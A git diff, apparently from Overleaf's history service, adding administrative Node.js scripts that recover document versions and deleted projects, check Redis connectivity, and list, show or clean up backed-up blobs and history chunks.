a/services/history-v1/storage/scripts/recover_doc_versions.js b/services/history-v1/storage/scripts/recover_doc_versions.js new file mode 100644 index 0000000..f121c60 --- /dev/null +++ b/services/history-v1/storage/scripts/recover_doc_versions.js @@ -0,0 +1,379 @@ +const fsPromises = require('node:fs/promises') +const { ObjectId } = require('mongodb') +const BPromise = require('bluebird') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const mongodb = require('../lib/mongodb') +const { chunkStore } = require('..') +const Events = require('node:events') + +// Silence warning. 
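+// Calling node:events setMaxListeners with no emitter arguments raises the
+// process-wide default listener limit (normally 10); the concurrent batch
+// processing below can otherwise trigger Node's MaxListenersExceededWarning.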
+Events.setMaxListeners(20) + +const BATCH_SIZE = 1000 +const OPTIONS = { + concurrency: parseInt(process.env.DOC_VERSION_RECOVERY_CONCURRENCY, 10) || 20, + force: process.env.DOC_VERSION_RECOVERY_FORCE === 'true', + 'skip-history-failures': + process.env.DOC_VERSION_RECOVERY_SKIP_HISTORY_FAILURES === 'true', + 'resyncs-needed-file': process.env.DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE, +} + +const db = { + deletedProjects: mongodb.db.collection('deletedProjects'), + docs: mongodb.db.collection('docs'), + migrations: mongodb.db.collection('migrations'), + projects: mongodb.db.collection('projects'), +} + +const BAD_MIGRATION_NAME = + '20231219081700_move_doc_versions_from_docops_to_docs' + +const RECOVERY_FILES_502 = [ + '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log', + '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log.done', +] + +let loggingChain = Promise.resolve() +const projectIdsThatNeedResyncing = [] +const unflushedDocIds = new Set() + +async function flushLogQueue() { + const logPath = OPTIONS['resyncs-needed-file'] + loggingChain = loggingChain.then(async () => { + const batch = projectIdsThatNeedResyncing.splice(0) + if (batch.length === 0) return + try { + await fsPromises.appendFile(logPath, batch.join('\n') + '\n') + } catch (err) { + projectIdsThatNeedResyncing.push(...batch) + logger.err({ err, logPath, batch }, 'Failed to write to log file') + } + }) + await loggingChain +} +async function recordProjectNeedsResync(projectId) { + if (OPTIONS['resyncs-needed-file']) { + projectIdsThatNeedResyncing.push(projectId) + await flushLogQueue() + } else { + console.log(`Project ${projectId} needs a hard resync.`) + } +} + +async function main() { + const recovery502Ran = await did502RecoveryRun() + await getUnflushedDocIds() + const badMigration = await db.migrations.findOne({ name: BAD_MIGRATION_NAME }) + + if (unflushedDocIds.size > 0 && !recovery502Ran && badMigration != null) { + // Tell customers that they need to flush + console.log(` +-------------------------------------------------------------------- +Detected unflushed changes while recovering doc versions. +Please go back to version 5.0.1 and follow the recovery procedure +for flushing document updates: + +https://github.com/overleaf/overleaf/wiki/Doc-version-recovery +--------------------------------------------------------------------`) + process.exit(1) + } + + if (OPTIONS.force || recovery502Ran || badMigration != null) { + console.warn('Need to recover doc versions. This will take a while.') + await runRecovery() + await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) + await delete502RecoveryFiles() + } + + console.log('Done.') +} + +async function did502RecoveryRun() { + for (const file of RECOVERY_FILES_502) { + try { + await fsPromises.stat(file) + return true + } catch (err) { + // file doesn't exist. continue + } + } + return false +} + +async function delete502RecoveryFiles() { + for (const file of RECOVERY_FILES_502) { + try { + await fsPromises.rename(file, file.replace('.log', '-5.0.2.log')) + } catch (err) { + // file doesn't exist. 
continue + } + } +} + +async function runRecovery() { + let batch = [] + const summary = { + ignored: 0, + skipped: 0, + deletedUpdatedMongo: 0, + deletedUpdatedRedis: 0, + deletedUpdatedBoth: 0, + deletedIgnored: 0, + updatedMongo: 0, + updatedRedis: 0, + updatedBoth: 0, + } + const processBatchAndLogProgress = async () => { + try { + await BPromise.map(batch, project => processProject(project, summary), { + concurrency: OPTIONS.concurrency, + }) + } finally { + console.log(`${summary.updatedRedis} projects updated in Redis`) + console.log(`${summary.updatedMongo} projects updated in Mongo`) + console.log( + `${summary.updatedBoth} projects updated in both Mongo and Redis` + ) + console.log(`${summary.ignored} projects had good versions`) + console.log( + `${summary.deletedUpdatedMongo} deleted projects updated in Mongo` + ) + console.log( + `${summary.deletedUpdatedRedis} deleted projects updated in Redis` + ) + console.log( + `${summary.deletedUpdatedBoth} deleted projects updated in both Mongo and Redis` + ) + console.log( + `${summary.deletedIgnored} deleted projects had good versions` + ) + console.log(`${summary.skipped} projects skipped`) + } + batch = [] + } + + await printDBStats() + await initResyncsNeededFile() + for await (const project of getProjects()) { + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + for await (const deletedProject of getDeletedProjects()) { + const project = deletedProject.project + project.isDeleted = true + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + if (batch.length > 0) { + await processBatchAndLogProgress() + } + + await backfillMissingVersions() +} + +async function getUnflushedDocIds() { + const batchSize = 1000 + let cursor = '0' + do { + const [newCursor, keys] = await rclient.scan( + cursor, + 'MATCH', + Settings.redis.documentupdater.key_schema.docVersion({ doc_id: '*' }), + 'COUNT', + batchSize + ) + for (const key of keys) { + unflushedDocIds.add(key.slice('DocVersion:'.length)) + } + cursor = newCursor + } while (cursor !== '0') +} + +async function printDBStats() { + const projects = await db.projects.estimatedDocumentCount() + const deletedProjects = await db.deletedProjects.countDocuments() + const docs = await db.docs.estimatedDocumentCount() + console.log( + `Need to check ${projects} projects and up to ${deletedProjects} deleted projects with a total of ${docs} docs.` + ) +} + +async function initResyncsNeededFile() { + const logPath = OPTIONS['resyncs-needed-file'] + if (logPath) { + await fsPromises.writeFile(logPath, '') + await fsPromises.rm(`${logPath}.done`, { force: true }) + } +} + +function getProjects() { + return db.projects.find({}, { projection: { _id: 1, overleaf: 1 } }) +} + +function getDeletedProjects() { + return db.deletedProjects.find( + { 'project.overleaf.history.id': { $exists: true } }, + { projection: { 'project._id': 1, 'project.overleaf': 1 } } + ) +} + +async function processProject(project, summary) { + const projectId = project._id.toString() + let updatedMongo = false + let updatedRedis = false + try { + const historyDocVersions = await getHistoryDocVersions(project) + + for (const { docId, version } of historyDocVersions) { + const update = await fixDocVersion(docId, version) + if (update != null) { + if (update.in === 'mongo') { + updatedMongo = true + } else if (update.in === 'redis') { + updatedRedis = true + } + } + } + + if (project.isDeleted) { + if (updatedMongo && updatedRedis) {
+ summary.deletedUpdatedBoth += 1 + } else if (updatedMongo) { + summary.deletedUpdatedMongo += 1 + } else if (updatedRedis) { + summary.deletedUpdatedRedis += 1 + } else { + summary.deletedIgnored += 1 + } + } else { + await recordProjectNeedsResync(projectId) + if (updatedMongo && updatedRedis) { + summary.updatedBoth += 1 + } else if (updatedMongo) { + summary.updatedMongo += 1 + } else if (updatedRedis) { + summary.updatedRedis += 1 + } else { + summary.ignored += 1 + } + } + } catch (err) { + logger.error({ err, projectId }, 'Failed to process project') + if (OPTIONS['skip-history-failures']) { + summary.skipped += 1 + } else { + throw err + } + } +} + +async function getHistoryDocVersions(project) { + const historyId = project.overleaf.history.id + const chunk = await chunkStore.loadLatest(historyId) + if (chunk == null) { + return [] + } + + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges() + snapshot.applyAll(changes) + const v2DocVersions = snapshot.getV2DocVersions() + if (v2DocVersions == null) { + return [] + } + return Object.entries(v2DocVersions.data).map(([docId, versionInfo]) => ({ + docId, + version: versionInfo.v, + })) +} + +async function fixDocVersion(docId, historyVersion) { + const redisVersion = await getRedisDocVersion(docId) + if (redisVersion != null && historyVersion >= redisVersion) { + await setRedisDocVersion(docId, historyVersion + 1) + return { + in: 'redis', + previousVersion: redisVersion, + newVersion: historyVersion + 1, + } + } else { + const docBeforeUpdate = await db.docs.findOneAndUpdate( + { + _id: new ObjectId(docId), + $or: [ + { version: { $lte: historyVersion } }, + { version: { $exists: false } }, + ], + }, + { $set: { version: historyVersion + 1 } }, + { projection: { _id: 1, version: 1 } } + ) + + if (docBeforeUpdate != null) { + return { + in: 'mongo', + previousVersion: docBeforeUpdate.version, + newVersion: historyVersion + 1, + } + } else { + return null + } + } +} + +async function getRedisDocVersion(docId) { + if (!unflushedDocIds.has(docId)) { + return null + } + const result = await rclient.get( + Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }) + ) + if (result == null) { + return null + } + return parseInt(result, 10) +} + +async function setRedisDocVersion(docId, version) { + const multi = rclient.multi() + multi.set( + Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }), + version + ) + multi.set(`UnflushedTime:{${docId}}`, Date.now(), 'NX') + await multi.exec() +} + +/** + * Set all remaining versions to 0 + */ +async function backfillMissingVersions() { + console.log('Defaulting version to 0 for remaining docs.') + await db.docs.updateMany( + { version: { $exists: false } }, + { $set: { version: 0 } } + ) +} + +main() + .finally(async () => { + console.log('Flushing log queue.') + await flushLogQueue() + }) + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/scripts/recover_zip.js b/services/history-v1/storage/scripts/recover_zip.js new file mode 100644 index 0000000..91872c0 --- /dev/null +++ b/services/history-v1/storage/scripts/recover_zip.js @@ -0,0 +1,255 @@ +/** + * Try to recover a zip of the latest version of a project using only data in + * GCS, where this data may have been (recently) hard deleted (i.e. may exist + * wholly or in part as non-current versions).
This should be able to + * retrieve the latest content of a project up to 180 days after it was + * deleted. + * + * Usage: + * node recover_zip.js [--verbose] <HISTORY_ID> <HISTORY_ID> ... + * + * Output: + * Signed URL(s) for the uploaded zip files. Note that these are valid for + * only 24h, to match the lifecycle rule on the zip bucket. + */ + +const fs = require('node:fs') +const os = require('node:os') +const path = require('node:path') +const util = require('node:util') + +// Something is registering 11 listeners, over the limit of 10, which generates +// a lot of warning noise. +require('node:events').EventEmitter.defaultMaxListeners = 11 + +const config = require('config') +// We depend on this via object-persistor. +// eslint-disable-next-line import/no-extraneous-dependencies +const { Storage } = require('@google-cloud/storage') +const isValidUtf8 = require('utf-8-validate') + +const core = require('overleaf-editor-core') +const projectKey = require('../lib/project_key') +const streams = require('../lib/streams') +const ProjectArchive = require('../lib/project_archive') + +const { + values: { verbose: VERBOSE }, + positionals: HISTORY_IDS, +} = util.parseArgs({ + options: { + verbose: { + type: 'boolean', + default: false, + }, + }, + allowPositionals: true, +}) + +if (HISTORY_IDS.length === 0) { + console.error('no history IDs; see usage') + process.exit(1) +} + +async function listDeletedChunks(historyId) { + const bucketName = config.get('chunkStore.bucket') + const storage = new Storage() + const [files] = await storage.bucket(bucketName).getFiles({ + prefix: projectKey.format(historyId), + versions: true, + }) + return files +} + +async function findLatestChunk(historyId) { + const files = await listDeletedChunks(historyId) + if (files.length === 0) return null + files.sort((a, b) => { + if (a.name < b.name) return -1 + if (a.name > b.name) return 1 + return 0 + }) + return files[files.length - 1] +} + +async function downloadLatestChunk(tmp, historyId) { + const latestChunkFile = await findLatestChunk(historyId) + if (!latestChunkFile) throw new Error('no chunk found to recover') + + const destination = path.join(tmp, 'latest.json') + await latestChunkFile.download({ destination }) + return destination +} + +async function loadHistory(historyPathname) { + const data = await fs.promises.readFile(historyPathname) + const rawHistory = JSON.parse(data) + return core.History.fromRaw(rawHistory) +} + +async function loadChunk(historyPathname, blobStore) { + const history = await loadHistory(historyPathname) + + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + + await blobStore.fetchBlobs(blobHashes) + await history.loadFiles('lazy', blobStore) + + return new core.Chunk(history, 0) +} + +// TODO: it would be nice to export / expose this from BlobStore; +// currently this is a copy of the method there. +async function getStringLengthOfFile(byteLength, pathname) { + // We have to read the file into memory to get its UTF-8 length, so don't + // bother for files that are too large for us to edit anyway. 
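+ // A non-null result therefore means the content passed the same
+ // editability checks applied below: valid UTF-8, within the maximum
+ // editable string length, no characters outside the Basic Multilingual
+ // Plane, and no NUL bytes.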
+ if (byteLength > core.Blob.MAX_EDITABLE_BYTE_LENGTH_BOUND) { + return null + } + + // We need to check if the file contains nonBmp or null characters + let data = await fs.promises.readFile(pathname) + if (!isValidUtf8(data)) return null + data = data.toString() + if (data.length > core.TextOperation.MAX_STRING_LENGTH) return null + if (core.util.containsNonBmpChars(data)) return null + if (data.indexOf('\x00') !== -1) return null + return data.length +} + +class RecoveryBlobStore { + constructor(historyId, tmp) { + this.historyId = historyId + this.tmp = tmp + this.blobs = new Map() + } + + async fetchBlobs(blobHashes) { + for await (const blobHash of blobHashes) { + await this.fetchBlob(blobHash) + } + } + + async fetchBlob(hash) { + if (this.blobs.has(hash)) return + + if (VERBOSE) console.log('fetching blob', hash) + + const bucketName = config.get('blobStore.projectBucket') + const storage = new Storage() + const [files] = await storage.bucket(bucketName).getFiles({ + prefix: this.makeProjectBlobKey(hash), + versions: true, + }) + + const destination = this.getBlobPathname(hash) + + if (files.length === 0) { + await this.fetchGlobalBlob(hash, destination) + } else if (files.length === 1) { + await files[0].download({ destination }) + } else { + throw new Error('Multiple versions of blob ' + hash) + } + + this.blobs.set(hash, await this.makeBlob(hash, destination)) + } + + async fetchGlobalBlob(hash, destination) { + const bucketName = config.get('blobStore.globalBucket') + const storage = new Storage() + const file = storage.bucket(bucketName).file(this.makeGlobalBlobKey(hash)) + await file.download({ destination }) + } + + async makeBlob(hash, pathname) { + const stat = await fs.promises.stat(pathname) + const byteLength = stat.size + const stringLength = await getStringLengthOfFile(byteLength, pathname) + return new core.Blob(hash, byteLength, stringLength) + } + + async getString(hash) { + const stream = await this.getStream(hash) + const buffer = await streams.readStreamToBuffer(stream) + return buffer.toString() + } + + async getStream(hash) { + return fs.createReadStream(this.getBlobPathname(hash)) + } + + async getBlob(hash) { + return this.blobs.get(hash) + } + + getBlobPathname(hash) { + return path.join(this.tmp, hash) + } + + makeGlobalBlobKey(hash) { + return `${hash.slice(0, 2)}/${hash.slice(2, 4)}/${hash.slice(4)}` + } + + makeProjectBlobKey(hash) { + return `${projectKey.format(this.historyId)}/${hash.slice( + 0, + 2 + )}/${hash.slice(2)}` + } +} + +async function uploadZip(historyId, zipPathname) { + const bucketName = config.get('zipStore.bucket') + const deadline = 24 * 3600 * 1000 // lifecycle limit on the zips bucket + const storage = new Storage() + const destination = `${historyId}-recovered.zip` + await storage.bucket(bucketName).upload(zipPathname, { destination }) + + const signedUrls = await storage + .bucket(bucketName) + .file(destination) + .getSignedUrl({ + version: 'v4', + action: 'read', + expires: Date.now() + deadline, + }) + + return signedUrls[0] +} + +async function restoreProject(historyId) { + const tmp = await fs.promises.mkdtemp( + path.join(os.tmpdir(), historyId.toString()) + ) + if (VERBOSE) console.log('recovering', historyId, 'in', tmp) + + const latestJsonPathname = await downloadLatestChunk(tmp, historyId) + const blobStore = new RecoveryBlobStore(historyId, tmp) + const chunk = await loadChunk(latestJsonPathname, blobStore) + + const snapshot = chunk.getSnapshot() + for (const change of chunk.getChanges()) { + change.applyTo(snapshot) 
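+ // Each change mutates the snapshot in place, so after this loop the
+ // snapshot holds the latest recoverable version of the project.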
+ } + + if (VERBOSE) console.log('zipping', historyId) + + const zipPathname = path.join(tmp, `${historyId}.zip`) + const zipTimeoutMs = 60 * 1000 + const archive = new ProjectArchive(snapshot, zipTimeoutMs) + await archive.writeZip(blobStore, zipPathname) + + if (VERBOSE) console.log('uploading', historyId) + + return await uploadZip(historyId, zipPathname) +} + +async function main() { + for (const historyId of HISTORY_IDS) { + const signedUrl = await restoreProject(historyId) + console.log(signedUrl) + } +} +main().catch(console.error) diff --git a/services/history-v1/storage/scripts/redis.mjs b/services/history-v1/storage/scripts/redis.mjs new file mode 100644 index 0000000..ce9a398 --- /dev/null +++ b/services/history-v1/storage/scripts/redis.mjs @@ -0,0 +1,36 @@ +import redis from '@overleaf/redis-wrapper' +import config from 'config' + +// Get allowed Redis dbs from config +const redisConfig = config.get('redis') +const allowedDbs = Object.keys(redisConfig) + +// Get the Redis db from the command line argument; missing or invalid values are rejected below +const db = process.argv[2] + +// Validate redis db +if (!allowedDbs.includes(db)) { + if (db) { + console.error('Invalid redis db:', db) + } + console.error(`Usage: node redis.mjs [${allowedDbs.join('|')}]`) + process.exit(1) +} + +// Get redis options based on command line argument +const redisOptions = config.get(`redis.${db}`) +console.log('Using redis db:', db) +console.log('REDIS CONFIG', { + ...redisOptions, + password: '*'.repeat(redisOptions.password?.length), +}) +const rclient = redis.createClient(redisOptions) + +try { + await rclient.healthCheck() + console.log('REDIS HEALTHCHECK SUCCEEDED') +} catch (error) { + console.error('REDIS HEALTHCHECK FAILED', error) +} finally { + await rclient.quit() +} diff --git a/services/history-v1/storage/scripts/remove_backed_up_blobs.mjs b/services/history-v1/storage/scripts/remove_backed_up_blobs.mjs new file mode 100644 index 0000000..0fa7201 --- /dev/null +++ b/services/history-v1/storage/scripts/remove_backed_up_blobs.mjs @@ -0,0 +1,104 @@ +// @ts-check +import { readFileSync } from 'node:fs' +import commandLineArgs from 'command-line-args' +import { client } from '../lib/mongodb.js' +import { + getBackedUpBlobHashes, + unsetBackedUpBlobHashes, +} from '../lib/backup_store/index.js' + +let gracefulShutdownInitiated = false + +// Parse command line arguments +const args = commandLineArgs([ + { name: 'input', type: String, alias: 'i', defaultOption: true }, + { name: 'commit', type: Boolean, defaultValue: false }, +]) + +if (!args.input) { + console.error( + 'Usage: node remove_backed_up_blobs.mjs --input <csv-file> [--commit]' + ) + process.exit(1) +} + +if (!args.commit) { + console.log('Running in dry-run mode.
Use --commit to apply changes.') +} + +// Signal handling +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + console.warn('Graceful shutdown initiated') + gracefulShutdownInitiated = true +} + +// Process CSV and remove blobs +async function main() { + const projectBlobs = new Map() + const lines = readFileSync(args.input, 'utf8').split('\n') + const SHA1_HEX_REGEX = /^[a-f0-9]{40}$/ + + // Skip header + for (const line of lines.slice(1)) { + if (!line.trim() || gracefulShutdownInitiated) break + + const [projectId, path] = line.split(',') + const pathParts = path.split('/') + const hash = pathParts[3] + pathParts[4] + + if (!SHA1_HEX_REGEX.test(hash)) { + console.warn(`Invalid SHA1 hash for project ${projectId}: ${hash}`) + continue + } + + if (!projectBlobs.has(projectId)) { + projectBlobs.set(projectId, new Set()) + } + projectBlobs.get(projectId).add(hash) + } + + // Process each project + for (const [projectId, hashes] of projectBlobs) { + if (gracefulShutdownInitiated) break + + if (!args.commit) { + console.log( + `DRY-RUN: would remove ${hashes.size} blobs from project ${projectId}` + ) + continue + } + + try { + const originalHashes = await getBackedUpBlobHashes(projectId) + if (originalHashes.size === 0) { + continue + } + const result = await unsetBackedUpBlobHashes( + projectId, + Array.from(hashes) + ) + if (result) { + console.log( + `Project ${projectId}: want to remove ${hashes.size}, removed ${originalHashes.size - result.blobs.length}, ${result.blobs.length} remaining` + ) + } + } catch (err) { + console.error(`Error updating project ${projectId}:`, err) + } + } +} + +// Run the script +main() + .catch(err => { + console.error('Fatal error:', err) + process.exitCode = 1 + }) + .finally(() => { + client + .close() + .catch(err => console.error('Error closing MongoDB connection:', err)) + }) diff --git a/services/history-v1/storage/scripts/remove_backup_blobs_from_wrong_path.mjs b/services/history-v1/storage/scripts/remove_backup_blobs_from_wrong_path.mjs new file mode 100644 index 0000000..119da2f --- /dev/null +++ b/services/history-v1/storage/scripts/remove_backup_blobs_from_wrong_path.mjs @@ -0,0 +1,221 @@ +// @ts-check + +/** + * This script is used to remove blobs that have been backed up under the project ID + * instead of the history ID (where those are different). + * + * This script reads a CSV file with the following format: + * ``` + * project_id,hash + * <mongo ID>,<hash> + * ``` + * + * The header row is optional. All rows will be checked for conformance to the format. 
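+ *
+ * An example row (both values hypothetical):
+ *
+ * ```
+ * 507f1f77bcf86cd799439011,a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
+ * ```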
+ */ + +import commandLineArgs from 'command-line-args' +import { backupPersistor, projectBlobsBucket } from '../lib/backupPersistor.mjs' +import { makeProjectKey } from '../lib/blob_store/index.js' +import fs from 'node:fs' +import assert from '../lib/assert.js' +import { client } from '../lib/mongodb.js' +import { verifyBlobs } from '../lib/backupVerifier.mjs' +import { setTimeout } from 'node:timers/promises' +import { getHistoryId } from '../lib/backup_store/index.js' + +const argsSchema = [ + { + name: 'input', + type: String, + }, + { + name: 'commit', + type: Boolean, + }, + { + name: 'header', + type: Boolean, + }, + { + name: 'force', + type: Boolean, + }, + { + name: 'verbose', + type: Boolean, + }, +] + +const args = commandLineArgs(argsSchema) + +async function gracefulClose(code = 0) { + await client.close() + process.exit(code) +} + +/** + * + * @param {(value: unknown) => void} fn + * @param {unknown} value + * @return {boolean} + */ +function not(fn, value) { + try { + fn(value) + return false + } catch { + return true + } +} + +/** + * + * @param {string} row + * @return {{projectId: string, hash: string}} + */ +function parseCSVRow(row) { + const [projectId, hash] = row.split(',') + assert.mongoId(projectId, `invalid projectId ${projectId}`) + assert.blobHash(hash, `invalid hash ${hash}`) + return { projectId, hash } +} + +/** + * + * @param {string} path + * @param {boolean} hasHeader + * @return {AsyncGenerator<{projectId: string, hash: string}, void, *>} + */ +async function* readCSV(path, hasHeader) { + let seenHeader = !hasHeader + let fh + try { + fh = await fs.promises.open(path, 'r') + } catch (error) { + console.error(`Could not open file: ${error}`) + return await gracefulClose(1) + } + for await (const line of fh.readLines()) { + if (!seenHeader) { + const [first, second] = line.split(',') + const noDataInHeader = + not(assert.mongoId, first) && not(assert.blobHash, second) + if (!noDataInHeader) { + console.error('Data found in header row') + return await gracefulClose(1) + } + seenHeader = true + continue + } + try { + yield parseCSVRow(line) + } catch (error) { + console.error(error instanceof Error ? 
error.message : error) + console.info(`Skipping invalid row: ${line}`) + } + } +} + +function usage() { + console.info( + 'Usage: remove_backup_blobs_from_wrong_path.mjs --input <path> [--commit] [--header] [--force] [--verbose]' + ) +} + +if (!args.input) { + console.error('--input was missing') + usage() + await gracefulClose(1) +} + +/** + * + * @param {string} projectId + * @param {string} hash + * @return {Promise<void>} + */ +async function deleteBlob(projectId, hash) { + const path = makeProjectKey(projectId, hash) + if (args.commit) { + await backupPersistor.deleteObject(projectBlobsBucket, path) + } else { + console.log(`DELETE: ${path}`) + } +} + +/** + * + * @param {string} projectId + * @param {string} hash + * @return {Promise<void>} + */ +async function canDeleteBlob(projectId, hash) { + let historyId + try { + historyId = await getHistoryId(projectId) + } catch (error) { + if (args.verbose) { + console.error(error) + } + throw new Error(`No history ID found for project ${projectId}, skipping`) + } + if (historyId === projectId) { + throw new Error( + `Project ID and history ID are the same for ${projectId} - use --force to delete anyway` + ) + } + + // TODO: fix assert.postgresId to handle integers better and then stop coercing to string below + assert.postgresId( + `${historyId}`, + `History ID ${historyId} does not appear to be for a postgres project` + ) + + try { + await verifyBlobs(`${historyId}`, [hash]) + } catch (error) { + if (args.verbose) { + console.error(error) + } + throw new Error( + `Blob ${hash} is not backed up for project ${projectId} - use --force to delete anyway` + ) + } +} + +if (!args.commit) { + console.log('DRY RUN: provide --commit to perform operations') +} + +if (args.force) { + console.log( + 'WARNING: --force is enabled, blobs will be deleted regardless of backup status' + ) + await setTimeout(5_000) +} + +let deleted = 0 +let errors = 0 + +for await (const { projectId, hash } of readCSV(args.input, args.header)) { + if (!args.force) { + try { + await canDeleteBlob(projectId, hash) + } catch (error) { + console.error(error instanceof Error ?
error.message : error) + continue + } + } + try { + await deleteBlob(projectId, hash) + deleted++ + } catch (error) { + errors++ + console.error(error) + } +} + +console.log(`Deleted: ${deleted}`) +console.log(`Errors: ${errors}`) + +await gracefulClose() diff --git a/services/history-v1/storage/scripts/show.mjs b/services/history-v1/storage/scripts/show.mjs new file mode 100644 index 0000000..b4ae166 --- /dev/null +++ b/services/history-v1/storage/scripts/show.mjs @@ -0,0 +1,254 @@ +import commandLineArgs from 'command-line-args' +import { + loadAtVersion, + getChunkMetadataForVersion, + getProjectChunksFromVersion, +} from '../lib/chunk_store/index.js' +import { client } from '../lib/mongodb.js' +import knex from '../lib/knex.js' +import redis from '../lib/redis.js' +import { + loadGlobalBlobs, + BlobStore, + makeProjectKey, +} from '../lib/blob_store/index.js' +import { TextDecoder } from 'node:util' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from '../lib/backupPersistor.mjs' +import fs from 'node:fs' +import { pipeline } from 'node:stream/promises' +import os from 'node:os' +import path from 'node:path' +import { createHash } from 'node:crypto' +import projectKey from '../lib/project_key.js' +import { createGunzip } from 'node:zlib' +import { text } from 'node:stream/consumers' + +const optionDefinitions = [ + { name: 'historyId', alias: 'p', type: String }, + { name: 'version', alias: 'v', type: Number }, + { name: 'blob', alias: 'b', type: String }, + { name: 'remote', alias: 'r', type: Boolean }, + { name: 'keep', alias: 'k', type: Boolean }, +] + +function makeChunkKey(projectId, startVersion) { + return path.join(projectKey.format(projectId), projectKey.pad(startVersion)) +} + +async function listChunks(historyId) { + for await (const chunkRecord of getProjectChunksFromVersion(historyId, 0)) { + console.log('Chunk record:', chunkRecord) + } +} + +async function fetchChunkLocal(historyId, version) { + const chunkRecord = await getChunkMetadataForVersion(historyId, version) + const chunk = await loadAtVersion(historyId, version) + return { key: version, chunk, metadata: chunkRecord, source: 'local storage' } +} + +async function fetchChunkRemote(historyId, version) { + const chunkRecord = await getChunkMetadataForVersion(historyId, version) + const startVersion = chunkRecord.startVersion + const key = makeChunkKey(historyId, startVersion) + const backupPersistorForProject = await backupPersistor.forProject( + chunksBucket, + key + ) + const backupChunkStream = await backupPersistorForProject.getObjectStream( + chunksBucket, + key + ) + const backupStr = await text(backupChunkStream.pipe(createGunzip())) + return { + key, + chunk: JSON.parse(backupStr), + metadata: chunkRecord, + source: 'remote backup', + } +} + +async function displayChunk(historyId, version, options) { + const { key, chunk, metadata, source } = await (options.remote + ? 
fetchChunkRemote(historyId, version) + : fetchChunkLocal(historyId, version)) + console.log('Source:', source) + console.log('Chunk record', metadata) + console.log('Key', key) + // console.log('Number of changes', chunk.getChanges().length) + console.log(JSON.stringify(chunk)) +} + +async function fetchBlobRemote(historyId, blobHash) { + const backupPersistorForProject = await backupPersistor.forProject( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + const blobKey = makeProjectKey(historyId, blobHash) + return { + stream: await backupPersistorForProject.getObjectStream( + projectBlobsBucket, + blobKey, + { autoGunzip: true } + ), + metadata: { hash: blobHash }, + source: 'remote backup', + } +} + +async function fetchBlobLocal(historyId, blobHash) { + const blobStore = new BlobStore(historyId) + const blob = await blobStore.getBlob(blobHash) + if (!blob) throw new Error(`Blob ${blobHash} not found`) + return { + stream: await blobStore.getStream(blobHash), + metadata: blob, + source: 'local storage', + } +} + +async function displayBlobContent(filepath, metadata, source, blobHash) { + console.log('Source:', source) + console.log('Blob metadata:', metadata) + + // Compute git hash using streaming + const stat = fs.statSync(filepath) + const header = `blob ${stat.size}\0` + const hash = createHash('sha1') + hash.update(header) + + const hashStream = fs.createReadStream(filepath) + for await (const chunk of hashStream) { + hash.update(chunk) + } + const gitHash = hash.digest('hex') + + // Check content type and display preview + const fd = fs.openSync(filepath, 'r') + try { + const headBuf = Buffer.alloc(16) + const tailBuf = Buffer.alloc(16) + + try { + // Stream through TextDecoder to check for valid UTF-8 + const textStream = fs.createReadStream(filepath) + const decoder = new TextDecoder('utf-8', { fatal: true }) + for await (const chunk of textStream) { + decoder.decode(chunk, { stream: true }) + } + decoder.decode() + // If we get here, it's valid UTF-8 + if (stat.size <= 1024) { + console.log('Content (text):', fs.readFileSync(filepath, 'utf8')) + } else { + console.log('Content (text, truncated):') + console.log(` Length: ${stat.size} bytes`) + fs.readSync(fd, headBuf, 0, 16, 0) + fs.readSync(fd, tailBuf, 0, 16, stat.size - 16) + console.log( + ' Content:', + headBuf.toString('utf8') + + ' ...(truncated)... ' + + tailBuf.toString('utf8') + ) + } + } catch (e) { + // Binary content - show head and tail + console.log('Content (binary):') + console.log(` Length: ${stat.size} bytes`) + + if (stat.size <= 32) { + // Small file - read it all + const buf = Buffer.alloc(stat.size) + fs.readSync(fd, buf, 0, stat.size, 0) + const hexBytes = buf.toString('hex').match(/../g).join(' ') + console.log(' Bytes:', hexBytes) + } else { + // Read tail for large files + fs.readSync(fd, headBuf, 0, 16, 0) + fs.readSync(fd, tailBuf, 0, 16, stat.size - 16) + const headHex = headBuf.toString('hex').match(/../g).join(' ') + const tailHex = tailBuf.toString('hex').match(/../g).join(' ') + console.log(' Bytes:', headHex + ' ...
' + tailHex) + } + console.log(' Git-style SHA1:', gitHash) + if (gitHash !== blobHash) { + console.log(' Warning: Git hash differs from blob hash!') + console.log(' Blob hash:', blobHash) + } + } + } finally { + fs.closeSync(fd) + } +} + +async function withTempDir(prefix, fn, options = {}) { + const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), prefix)) + try { + return await Promise.resolve(fn(tmpDir)) + } finally { + if (!options.keep) { + fs.rmSync(tmpDir, { recursive: true, force: true }) + } else { + console.log('Keeping temporary file:', path.join(tmpDir, 'blob')) + } + } +} + +async function displayBlob(historyId, blobHash, options) { + try { + const { stream, metadata, source } = await (options.remote + ? fetchBlobRemote(historyId, blobHash) + : fetchBlobLocal(historyId, blobHash)) + + await withTempDir( + 'blob-show-', + async tmpDir => { + const tmpPath = path.join(tmpDir, 'blob') + await pipeline(stream, fs.createWriteStream(tmpPath)) + await displayBlobContent(tmpPath, metadata, source, blobHash) + }, + { keep: options.keep } + ) + } catch (err) { + if (err.code === 'NoSuchKey') { + throw new Error(`Blob ${blobHash} not found in backup`) + } + throw err + } +} + +async function main() { + const { historyId, version, blob, remote, keep } = + commandLineArgs(optionDefinitions) + if (!historyId) { + console.error('Error: --historyId is required.') + process.exit(1) + } + await loadGlobalBlobs() + if (version != null) { + await displayChunk(historyId, version, { remote }) + } else if (blob != null) { + await displayBlob(historyId, blob, { remote, keep }) + } else { + await listChunks(historyId) + } +} + +main() + .then(() => console.log('Done.')) 